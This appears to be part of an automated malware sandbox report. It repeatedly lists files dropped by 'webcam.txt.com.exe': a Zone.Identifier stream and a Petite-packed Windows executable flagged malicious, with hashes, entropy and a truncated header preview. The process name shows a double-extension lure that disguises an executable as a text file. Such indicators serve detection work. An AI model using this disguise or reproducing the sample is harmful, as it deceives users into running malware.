                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
